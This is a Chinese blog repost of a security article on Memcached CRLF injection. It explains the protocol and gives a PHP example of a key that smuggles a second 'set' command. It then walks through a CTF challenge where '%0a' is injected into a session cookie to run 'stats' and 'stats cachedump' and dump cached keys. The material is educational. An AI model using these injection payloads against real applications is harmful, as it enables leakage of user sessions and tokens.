被人遗忘的Memcached内存注射

最新推荐文章于 2023-03-17 19:44:40 发布
最新推荐文章于 2023-03-17 19:44:40 发布
阅读量1.6k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124313217
版权

web安全 网络安全 安全 hack wooyun

0x00 写在前面

wooyun主站也有过Memcached相关漏洞,但大多都是未授权访问,其实即使是部署得当的Memcached,如果碰上安全意识差的程序员哥哥,那么同样会出现Memcached安全风险,导致敏感内存泄露。

也就是本文要说的Memcached注入

0x01 Memcached简介&安全性分析

Memcached 是一个高性能的分布式内存对象缓存系统,用于动态Web应用以减轻数据库负载。

它通过在内存中缓存数据和对象来减少读取数据库的次数,从而提高动态、数据库驱动网站的速度。

用白话就是说,当传统web将访问产生的临时数据存储在后端数据库(如user sessions),部署了Memcached的应用会将user sessions以及其他一些敏感信息存储在RAM中,增速同时也减轻后端数据库反复查询带来的负载。

Memcached创建者Dormando很早就写过两篇文章,告诫开发人员不要用memcached存储Session。但是很多开发者为了性能或者其他原因,依旧把session存储在memcached中。这样做,一旦memcached被攻击,直接将导致管理员或者是用户token泄露。

0x02 Memcached协议

当Memcache被部署之后,我们该如何向其中添加数据?我们通过一个cheat sheet了解一下Memcached的协议。

Memcached的语法由如下元素组成

{COMMAND}0x20{ARGUMENT}(LF|CRLF)

command字段有如下几条命令

  1. 存储操作(set, add, replace, append, prepend, cas)
  2. 检索操作 (get, gets)
  3. 删除操作 (delete)
  4. 增减操作 (incr, decr)
  5. touch
  6. slabs reassign
  7. slabs automove
  8. lru_crawler
  9. 统计操作(stats items, slabs, cachedump)
  10. 其他操作 (version, flush_all, quit)

下面给出几个安全测试中有用的命令

Command描述实例
get读某个值get mykey
set强制设置某个键值set mykey 0 60 5
add添加新键值对add newkey 0 60 5
replace覆盖已经存在的keyreplace key 0 60 5
flush_all让所有条目失效flush_all
stats打印当前状态stats
stats malloc打印内存状态stats malloc
version打印Memcached版本version

stats cachedump 读取内存中存储的条目

0x03 Memcached代码实现

部署好Memcached之后,一个调用Memcached的php代码是这样的。

1

2

3

4

5

6

7

<code>#!php

<?php   

$m = new Memcached();    

$m->set("prefix_".$_GET[‘key’],"data");

</code>

为了体现漏洞的产生,我想这样写

1

2

3

4

5

6

7

8

9

10

11

<code>#!php

<?php   

$m = new Memcached();   

$m->addServer('localhost', 11211);   

$m->set("key1 0 0 1\r\n1\r\nset injected 0 3600 10\r\n1234567890\r\n","1234567890",30);   

?>

</code>

set("key1 0 0 1\r\n1\r\nset injected 0 3600 10\r\n1234567890\r\n","1234567890",30)

是的,这里也就能看到问题。

执行刚刚的命令的时候,server和client的通信是这样的(>表示发送到Memcached ,<表示从Memcached的返回)

1

2

3

4

5

6

7

8

9

10

11

12

13

14

<code>> set key 0 0 1

> 1

< STORED

set injected 0 3600 10

> 1234567890

< STORED

> 0 30 10

< ERROR

> 1234567890

< ERROR

</code>

可以看到,对Memcached的协议来讲,\r\n是可以用来分割命令的,所以说,我们能直接通过CLRF注入,将\r\n注入到将要传入Memcached的元素中(例如cookies),实现命令执行。

0x04 Memcache Injection实例

最近的一次ctf中,有一个典型的基于CLRF的Memcache注入。(目前该站可以访问)

http://login2.chal.mmactf.link/login

login as admin

登录之后的请求是这样的

1

2

3

4

5

6

7

8

9

10

<code>GET / HTTP/1.1

Host: login2.chal.mmactf.link

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/   20100101 Firefox/38.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://login2.chal.mmactf.link/login

Cookie: ss=c4a613cdf3378b458be9a6d8de6c52c6ab260d1ee5c2d94df6fe260e580b16bb

Connection: keep-alive

</code>

在测试http头注入的时候,我们发现将%0a注入到cookies中时,也就是请求:

Cookie: ss=%0ac4a613cdf3378b458be9a6d8de6c52c6ab260d1ee5c2d94df6fe260e580b16bb

返回如下

1

2

3

4

5

6

7

8

<code></div>

<div id="info">

<p>MemcacheError:ERROR 

ERROR</p>

</div>

</body>

</html>

</code>

恩,memcached出错了,那不就是刚刚提到的error吗?

1

2

3

<code>> 1234567890

< ERROR

</code>

说明这里ss的value代入了memcached。

我们继续在cookies里面注入:ss=%0astats

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

<code>MemcacheError:ERROR

STAT pid 988

STAT uptime 651664

STAT time 1442726665

STAT version 1.4.14 (Ubuntu)

STAT libevent 2.0.21-stable

STAT pointer_size 64

STAT rusage_user 17.256000

STAT rusage_system 18.232000

STAT curr_connections 5

STAT total_connections 946

STAT connection_structures 6

STAT reserved_fds 20

STAT cmd_get 615

STAT cmd_set 188

STAT cmd_flush 0

STAT cmd_touch 0

STAT get_hits 299

STAT get_misses 316

STAT delete_misses 0

STAT delete_hits 42

STAT incr_misses 0

STAT incr_hits 0

STAT decr_misses 0

STAT decr_hits 0

STAT cas_misses 0

STAT cas_hits 0

STAT cas_badval 0

STAT touch_hits 0

STAT touch_misses 0

STAT auth_cmds 0

STAT auth_errors 0

STAT bytes_read 54350

STAT bytes_written 86307

STAT limit_maxbytes 67108864

STAT accepting_conns 1

STAT listen_disabled_num 0

STAT threads 4

STAT conn_yields 0

STAT hash_power_level 16

STAT hash_bytes 524288

STAT hash_is_expanding 0

STAT expired_unfetched 15

STAT evicted_unfetched 0

STAT bytes 1137

STAT curr_items 8

STAT total_items 153

STAT evictions 0

STAT reclaimed 96

END

</code>

果然返回了memcached的stats

现在来做我们最想做的一件事情,dump内存中的东西看看:我们利用cachedump

stats cachedump {slab class} {number of items to dump}

这里需要介绍下 memcached是以slab class进行分类的 比如:

1

2

3

4

5

6

<code>$ memcached -vv

slab class   1: chunk size        96 perslab   10922

slab class   2: chunk size       120 perslab    8738

slab class   3: chunk size       152 perslab    6898

slab class   4: chunk size       192 perslab    5461

</code>

我们可以看到每个class的编排

所以我们每一个都dump出来看看才好:

Cookie: %0astats cachedump 1 1000

返回为

MemcacheError:ERROR ITEM key [1 b; 1441762228 s] ITEM 12345 [20 b; 1441494967 s] END

当我遍历到class 3的时候:

1

2

3

4

5

6

7

8

9

10

11

12

13

<code>Cookie: %0astats cachedump 3 1000   

MemcacheError:ERROR

ITEM 3f063d8659f0f08c4454554294aca59bbe42cc6e11db23eb69f5a1c0a9486aa1 [19 b; 1442016274 s]

ITEM 0e9d0aecea498b15ee63d38dd4664dcfc75be0846ec4baee931b45a04462eeab [20 b; 1441494967 s]

ITEM 09cf27be606344f29bda74bd7c035e6d862c95025a2a6bb1785c8883ae65b18a [16 b; 1441494967 s]

ITEM b33542ed3c8bf5c2c346e26aac28a10055fa6a50c4948873810798e9f4cfca98 [20 b; 1441494967 s]

ITEM e391306f6481940ab3c796eb1253435b06e9a9357227de734b0ec3f58bd14d7f [19 b; 1442011213 s]

ITEM c706b288065ad5c29153d8773c3e3be6e8a07408cdf4e0e40e97917896e43839 [19 b; 1442012877 s]

ITEM a5e754e6e804bf7e49f8096242a6566cc337b06aa6c2dafda3f86edccf8cb4b3 [19 b; 1442011191 s]

ITEM edf938c33d05ff9f8696415d5ef817014a5cc2906abe24576fdafe8ae58dde48 [19 b; 1442010879 s]

ITEM 5f7d07e310e9fad574d0975741a9c05d0d75d7157ce9bb9546b7f58d940cee7a [19 b; 1442006048 s]

ITEM 3d1a32800a501fe7387287ba4631ae9318206ef96083a29f35fd1ef42f7a85c5 [19 b; 1441998916 s]

</code>

终于注入到我们所需要的class中去。

0x05 参考

Memcache cheat sheetmemcached Cheat Sheet

Memcached Injectionhttps://www.blackhat.com/docs/us-14/materials/us-14-Novikov-The-New-Page-Of-Injections-Book-Memcached-Injections-WP.pdf

本文章来源于乌云知识库,文章版权归乌云知识库!

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
redis与memcached
july_2的专栏
03-20 638
这两年 Redis火得可以,Redis也常常被当作 Memcached的挑战者被提到桌面上来。关于Redis与Memcached的比较更是比比皆是。然而,Redis真的在功能、性能以及内存使用效率上都超越了Memcached吗? 没有必要过于关注性能,因为二者的性能都已经足够高了。由于Redis只使用单核,而Memcached可以使用多核,所以二者比较起来,平均每一个核上,Redis在存储小数据
memcached过时了吗
qianxc88的专栏
01-26 453
传送门
Memcached真的过时了吗
技术宅
05-11 255
这两年 Redis火得可以,Redis也常常被当作 Memcached的挑战者被提到桌面上来。关于Redis与Memcached的比较更是比比皆是。然而,Redis真的在功能、性能以及内存使用效率上都超越了Memcached吗?没有必要过于关注性能,因为二者的性能都已经足够高了。由于Redis只使用单核,而Memcached可以使用多核,所以二者比较起来,平均每一个核上,Redis在存储小数据时比...
个人对memcached的看法
虚客
01-31 137
1、请求由client端进行处理,client端维护着一个memcached服务器列表,根据用户的请求将响应指向不同的memcached服务器;(也就是说,每个缓冲值,在所有服务器中只保持着一份copy,不像ehcache每个服务器中都有) 2、memcached对CPU的要求不高,但对内存要求较高,因此可以与webapp server安装在一起,互补(web app server是CPU要求高...
PHP内存缓存Memcached类实例
10-25
如果键不存在,它会被添加到表的键列表中,并保存到Memcached,以备后续使用。这个功能对于构建键值对的缓存系统至关重要。 `addCache()`方法用于向Memcached中添加数据,它接收表名、SQL语句(作为key的哈希值)和...
Memcached内存分析、调优、集群.pdf
最新发布
03-01
### Memcached内存分析、调优、集群 #### 一、Memcached背景介绍 Memcached是一款高性能的分布式内存对象缓存系统,它通过减轻数据库负担来加速动态Web应用程序的速度。最初由LiveJournal的开发者Brad Fitzpatrick...
Memcached内存分析、调优、集群.pptx
09-17
Memcached内存分析、调优、集群 Memcached是一个高性能的分布式内存缓存服务器,开源、协议简单、基于libevent时间处理机制,内置内存存储方式为slab/LRU。Memcached支持多种语言,如C/C++、PHP、Java、Python、...
PHP内存缓存功能memcached示例
10-21
memcached是一个高性能、轻量级的分布式内存对象缓存系统,其设计目的是为了提升动态网页应用程序的速度和效率。它通过存储数据到内存中,避免了频繁读取或计算数据库,从而大大减少了I/O操作,提高了响应速度。...
分布式场景下redis已经逐渐取代了memcached,那么各有什么使用场景和优缺点呢?
zhenghhgz的博客
02-26 726
简介 说到缓存技术,只要有一定经验的开发人员,肯定会想到redis和memcached这两个。并且在BAT里,redis已经逐渐取代了memcached,成为分布式场景广泛使用的缓存方案。接下来,我们就分析下,redis是如何取代memcached,成为开发者的宠儿的。 一、支持的存储类型不同 虽然redis和memcached都是内存型数据库,并且memcached不仅能够存储string类型...
memcached在大负载高并发网站上的应用(2) ---应用场景 王泽宾
weixin_34409822的博客
02-05 183
写这篇文章之前,我也特意跟以前的同事做了一些交流,在此感谢sina xiangdong、kingsoft zhangyan和yahoo luke。另外,还有网上的朋友对我上一节的文章发表了许多有建设性评论,在这里一并感谢。 memcached最吸引人的地方主要在于它的分布式。分布式对于互联网应用来讲,按照用途基本上可划分为三种方式:分布式计算、分布式存储和...
memcached 和 redis 使用场景及优缺点对比
qq_17383737的博客
03-24 681
memcached 和 redis 使用场景及优缺点对比 memcached 和 redis 都很类似:都是内存型数据库,数据保存在内存中,通过tcp直接存取,优势是速度快,并发高,缺点是数据类型有限,查询功能不强,一般用作缓存。 那么题主说 memcached 的事情 redis 都可以做,那么为什么 memcached 还有人用?那是因为它们两者并不是完全可以相互替代的,它们也有各自的长短优缺...
Redis和Memcached: 哪个更适合你的应用?
愿万事胜意
03-17 3289
对于大多数的系统服务来说,缓存是提高性能和可伸缩性的关键。一般情况下我们会从Redis和Memcached这两种不同的缓存方案中进行选择,它们各有优缺点。在这篇文章中,我们将探讨Redis和Memcached的区别,以及在哪种情况下应该选择哪种缓存解决方案。
Redis入门
行者小朱的博客
08-17 645
一、概念 Redis是一个开源的、支持网络的、可基于内存的、可持久化的日志型、Key-Value数据库,提供了多种语言的API。Redis支持的数据类型有五种:string(字符串)、list(列表)、set(集合)、sorted set(有序集合)、hash(散列)。 二、Redis特点 1、Redis本质上是一个Key-Value类型的内存数据库(Key-
[2022 ACTF]web题目复现
cosmoslin的博客
07-06 1624
查看dockerfile发现题目使用环境为goahead5.1.4,联想到p神对于该漏洞的复现记录,我们有两种方法解题:GoAhead环境变量注入复现踩坑记hack.c 编译 exp.py exp.py 简单看一下代码逻辑:server.js 整个题目通过websockets通信,当api为getflag时传入flagbot 这里发现admin登录没有任何限制,那么我们登录admin再传入getflag即可 原型链污染: xss: ToLeSion 考点: TLS-Poison 一篇文章带你读懂 TLS
Redis和Memcached区别
weixin_38517665的博客
05-17 6280
本文参考 Redis与Memcached的区别。 如果简单地比较Redis与Memcached的区别,大多数都会得到以下观点: Redis不仅仅支持简单的k/v类型的数据,同时还提供list,set,zset,hash等数据结构的存储。 Redis支持数据的备份,即master-slave模式的数据备份。 Redis支持数据的持久化,可以将内存中的数据保持在磁盘中,重启的时候可以再次加载进行使用。 抛开这些,可以深入到Redis内部构造去观察更加本质的区别,理解Redis的设计。 网络IO模型 Memcac
Memcached真的过时了吗?【转帖】
weixin_34064653的博客
03-13 162
这两年Redis火得可以,Redis也常常被当作Memcached的挑战者被提到桌面上来。关于Redis与Memcached的比较更是比比皆是。然而,Redis真的在功能、性能以及内存使用效率上都超越了Memcached吗?下面内容来自Redis作者在stackoverflow上的一个回答,对应的问题是《Is memcached a dinosaur in comparison to Redis?...
CTF - WEB redis的简介与利用
iamsongyu的博客
11-17 2889
        Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。         Redis 是一个高性能的key-value数据库。 redis的出现,很大程度补偿了memcached这类key/value存储的不足,在部 分场合可以对关系数据库起到很好的补充作用。              --百度 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值